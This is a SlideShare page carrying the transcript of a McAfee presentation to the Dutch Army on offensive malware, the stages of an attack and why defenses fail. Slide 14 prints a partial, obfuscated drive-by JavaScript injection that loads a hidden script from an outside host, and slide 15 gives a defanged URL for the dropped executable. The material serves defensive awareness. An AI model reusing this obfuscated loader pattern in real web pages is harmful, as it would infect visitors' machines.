Your SlideShare is downloading. ×
0
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Offensive malware usage and defense
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Offensive malware usage and defense

3,578

Published on

Presentation for the Dutch Army around cyberwarfare and the usage of malware.

Presentation for the Dutch Army around cyberwarfare and the usage of malware.

Published in: Technology
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
3,578
On Slideshare
0
From Embeds
0
Number of Embeds
3
Actions
Shares
0
Downloads
47
Comments
0
Likes
3
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Malware Offensive usage and how to defendChristiaan BeekMcAfee Professional Services
  • 2. Agenda• $whoami• Examples• Offensive ways of using malware• What goes wrong• Defense recommendations• Final thoughts
  • 3. > whoami• Christiaan Beek• Practice lead IR & Forensics EMEA• Developer/Instructor MFIRE• Training CERTS
  • 4. A Little BackgroundFoundstone Services – McAfee Strategic Security
  • 5. OFFENSE
  • 6. Offensive usage of malware ENERGY & INFRA Financial MEDICAL MOBILE Defense
  • 7. Offensive usage of malwareWhy malware?• low profile during preparation• many options to spread / infect• many ways to hide• self destruct mechanism• many ways to transfer data to
  • 8. Offensive usage of malware• More and more discovery of malware frameworks• Multiple modules /components• Written by pro’s – sponsored by nations
  • 9. Offensive - What’s Different? Development Delivery Detection Command & Control Intent• Nation-States • Zero day • Digitally signed • Central • Surveillance propagation with command• Truly compromised • Disrupt / customized • Multi-vectored: certificates • Modular Destroy payloads Blue tooth, payloads USB, network • Outbound ex- filtration masking
  • 10. Stages of an attack:
  • 11. Stages of an attack:
  • 12. Stages of an attack:
  • 13. Stages of an attack:
  • 14. Stages of an attack – first script script type="text/javascript" src="swfobject.js"></script> <script src=jpg.js></script> <script type="text/javascript"> if(document.cookie.indexOf("DCHJEik8=")==-1 && hiOC2.indexOf("linux")<=-1 && hiOC2.indexOf("bot")==-1 && hiOC2.indexOf("spider")==-1) var jMJFRp3=deconcept.SWFObjectUtil.getPlayerVersion(); var expires=new Date(); expires.setTime(expires.getTime()+1*60*60*1000); document.cookie="DCHJEik8=Yes;path=/;expires="+expires.toGMTString(); for(WdkimKX2=0,gNRb4=true,sAgnGw8=["msie","firefox","opera"];gNRb4;WdkimKX2++){gNRb4=gNRb4 && (navigator.userAgent.toLowerCase().indexOf(sAgnGw8[WdkimKX2])>-1);if(WdkimKX2==sAgnGw8.length- 1)WdkimKX2=-1;}Hwqq6="0";delete Hwqq6;try{Hwqq6+="0"+"0";}catch(e){yltBe1=unescape;mYSdOxl6 = eval;}CwefLf0=“S1+ADphS1(hmacmx8)))^MqiovxR7);}try{new function(){EmIcO0(EJiD6);}}catch(e){try{new function(){Qkrnq6=parseInt;vKFaTPR4(EJiD6);}}catch(e) } </script> <DIV style="VISIBILITY: hidden; WIDTH: 0px; HEIGHT: 0px"><script language="javascript" src="hxxp://count2.51yes……….. 31931&logo=12" charset="gb2312"></script></DIV>
  • 15. Final destination?: hxxp://222.7x.xx.xx.xx/x.exe
  • 16. Inner working?
  • 17. IIS logs on hacked ‘landing’ server: 9/23/2012 4:06:16 70.49.x.x W3SVC1 80 GET /x.exe 9/23/2012 4:07:46 99.23.x.x W3SVC1 80 GET /x.exe 9/23/2012 4:08:25 93.80.x.x W3SVC1 80 GET /x.exe 9/23/2012 4:14:48 208.91.x.x W3SVC1 80 GET /x.exe 9/23/2012 4:36:05 95.27.x.x W3SVC1 80 GET /pay/x.exe 9/23/2012 5:15:23 208.91.x.x W3SVC1 80 GET /x.exe 9/23/2012 5:29:27 74.125.x.x W3SVC1 80 GET /x.exe Dial 80 Or 443
  • 18. War story
  • 19. Future usage of malware
  • 20. Future scenario’s
  • 21. Future scenario’s or real...?
  • 22. Future scenario’s
  • 23. Future scenario’s
  • 24. Future scenario’s
  • 25. Future scenario’s
  • 26. Future scenario’s
  • 27. Future scenario’s
  • 28. What goes wrong regarding Defense? An Intel company
  • 29. Problem #1 An Intel company Many solutions but how to use them? Forensic Readiness?
  • 30. Problem #2 An Intel company No visibility on the network No correlation of events
  • 31. Problem #3 An Intel companyLack of skilled,experienced anddedicated people
  • 32. Problem #4 An Intel company No Incident Response procedures No Dry-run exercise
  • 33. Problem #5 An Intel companyThe attack camefrom…..
  • 34. Problem #6 An Intel company Destroying evidence
  • 35. Problem #7 An Intel company who is the system owner? who will take action? who is allowed to take decisions?
  • 36. An Intel companyDefense Strategies
  • 37. The Big “Threat” Picture Threats Threats All Threats All Known Core AntiVirus AntiVirus Threats Sees Protects
  • 38. The “Core” Security Problem • “Unauthorized” Execution End Users = Data – Payload/attachment/link – Network Identity Thieves Spammers – Privilege Bot Herder • “Authorized” Execution – Insiders misuse of privilege Vulnerability Tool Discoverers Developers 100101010010110 Malware Developers
  • 39. Defense-in-depth
  • 40. Worthless without:
  • 41. Final thoughts...... An Intel company - Incidents happen - Is forensic & malware readiness on your agenda? - What needs to be changed in your process? - Is your {army-unit/company/agency/etc} prepared? - Did you separate critical infrastructures? - Can we help you?
  • 42. Thank you! An Intel companyKeep in touch:Email: Christiaan_Beek@McAfee dot comTwitter: @FSEMEA @Foundstone @ChristaanBeek

×